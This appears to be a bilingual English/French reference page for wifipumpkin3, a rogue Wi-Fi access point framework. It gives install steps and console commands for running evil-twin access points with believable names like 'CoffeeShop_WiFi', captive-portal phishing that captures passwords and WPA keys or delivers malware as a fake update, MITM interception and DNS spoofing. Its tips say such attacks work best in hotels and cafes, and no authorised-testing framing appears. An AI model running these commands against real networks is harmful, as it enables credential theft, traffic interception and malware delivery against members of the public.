wifipumpkin3

Framework de point d'accès rogue. Crée des AP evil twin, effectue des attaques MITM sur les clients connectés, lance des phishing par portail captif, et prend en charge le DNS spoofing et l'interception de trafic. Rogue access point framework. Creates evil twin APs, performs MITM attacks on connected clients, launches captive portal phishing, and supports DNS spoofing and traffic interception.

↗ https://github.com/P0cL4bs/wifipumpkin3

Overview

WiFi-Pumpkin3 is a comprehensive rogue access point framework. It creates fake APs to lure clients, intercepts their traffic, serves captive portals for credential phishing, and supports plugins for DNS spoofing, SSL stripping, and traffic manipulation.

Installation

pip3 install wifipumpkin3
# or
git clone https://github.com/P0cL4bs/wifipumpkin3
cd wifipumpkin3
python3 setup.py install

Basic Usage

Launch interactive console

wifipumpkin3

Launch with configuration file

wifipumpkin3 --config config.ini

Non-interactive with script

wifipumpkin3 --pulp script.wp3

Creating a Rogue AP

# In wifipumpkin3 console:
wp3 > set interface wlan0
wp3 > set ssid "FreeWiFi"
wp3 > set proxy noproxy
wp3 > start

# Or with internet access (more believable)
wp3 > set interface wlan0
wp3 > set ssid "CoffeeShop_WiFi"
wp3 > set internet true
wp3 > set internetinterface eth0
wp3 > start

Captive Portal Phishing

# Enable captive portal
wp3 > set proxy captiveflask
wp3 > set ssid "Hotel_WiFi"
wp3 > start

# Captive portal plugins:
# - login form (email/password capture)
# - network password (WPA key phishing)
# - software update (malware delivery)

Traffic Interception

# Enable MITM proxy
wp3 > set proxy mitmproxy
wp3 > start

# Or use noproxy + external sniffer
wp3 > set proxy noproxy
wp3 > start
# Then: wireshark/tcpdump on ap0/wlan0ap

DNS Spoofing

# Configure DNS spoof
wp3 > set plugin dnsspoof
wp3 > set plugin.dnsspoof.domains {"example.com": "10.0.0.1"}
wp3 > start

# Redirect all traffic for a domain to attacker

Automation Scripts

# .wp3 script file example:
set interface wlan0
set ssid "FreeWifi"
set proxy noproxy
ignore pydns_server
start
sleep 60
stop

Tips

  • Requires a wireless adapter that supports AP mode (monitor mode alone is not sufficient)
  • Two adapters recommended: one for AP, one for internet passthrough
  • Captive portal attacks are most effective in hospitality environments (hotels, cafes)
  • WPA Enterprise evil twin is more reliable — use eaphammer for that
  • SSL stripping has limited effectiveness against modern HSTS-protected sites
Help / Man page
wifipumpkin3 [options]

--interface I   Wireless interface
--ssid S        AP SSID
--config F      Config file
--pulp F        Script file (.wp3)

Console commands:
  set KEY VALUE    Set configuration
  start            Start the access point
  stop             Stop the access point
  plugins          List available plugins
  show             Show current settings
  help             Show help

Vue d’ensemble

WiFi-Pumpkin3 est un framework complet de point d’accès rogue. Il crée de faux AP pour attirer les clients, intercepte leur trafic, sert des portails captifs pour le phishing d’identifiants, et prend en charge des plugins pour le DNS spoofing, le SSL stripping et la manipulation de trafic.

Installation

pip3 install wifipumpkin3
# ou
git clone https://github.com/P0cL4bs/wifipumpkin3
cd wifipumpkin3
python3 setup.py install

Utilisation de base

# Lancer la console interactive
wifipumpkin3

# Lancer avec un fichier de configuration
wifipumpkin3 --config config.ini

# Non interactif avec un script
wifipumpkin3 --pulp script.wp3

Créer un AP rogue

# Dans la console wifipumpkin3 :
wp3 > set interface wlan0
wp3 > set ssid "FreeWiFi"
wp3 > set proxy noproxy
wp3 > start

# Ou avec accès Internet (plus crédible)
wp3 > set interface wlan0
wp3 > set ssid "CoffeeShop_WiFi"
wp3 > set internet true
wp3 > set internetinterface eth0
wp3 > start

Phishing par portail captif

# Activer le portail captif
wp3 > set proxy captiveflask
wp3 > set ssid "Hotel_WiFi"
wp3 > start

# Plugins de portail captif :
# - formulaire de connexion (capture email/mot de passe)
# - mot de passe réseau (phishing de clé WPA)
# - mise à jour logicielle (livraison de malware)

Interception de trafic

# Activer le proxy MITM
wp3 > set proxy mitmproxy
wp3 > start

# Ou utiliser noproxy + un sniffer externe
wp3 > set proxy noproxy
wp3 > start
# Puis : wireshark/tcpdump sur ap0/wlan0ap

DNS spoofing

# Configurer le DNS spoof
wp3 > set plugin dnsspoof
wp3 > set plugin.dnsspoof.domains {"example.com": "10.0.0.1"}
wp3 > start

# Rediriger tout le trafic pour un domaine vers l'attaquant

Scripts d’automatisation

# Exemple de fichier script .wp3 :
set interface wlan0
set ssid "FreeWifi"
set proxy noproxy
ignore pydns_server
start
sleep 60
stop

Conseils

  • Nécessite un adaptateur wireless prenant en charge le mode AP (le mode monitor seul ne suffit pas)
  • Deux adaptateurs recommandés : un pour l’AP, un pour le passthrough Internet
  • Les attaques de portail captif sont les plus efficaces dans les environnements d’hospitalité (hôtels, cafés)
  • L’evil twin WPA Enterprise est plus fiable : utiliser eaphammer pour cela
  • Le SSL stripping a une efficacité limitée contre les sites modernes protégés par HSTS
Aide / Page de manuel
wifipumpkin3 [options]

--interface I   Wireless interface
--ssid S        AP SSID
--config F      Config file
--pulp F        Script file (.wp3)

Console commands:
  set KEY VALUE    Set configuration
  start            Start the access point
  stop             Stop the access point
  plugins          List available plugins
  show             Show current settings
  help             Show help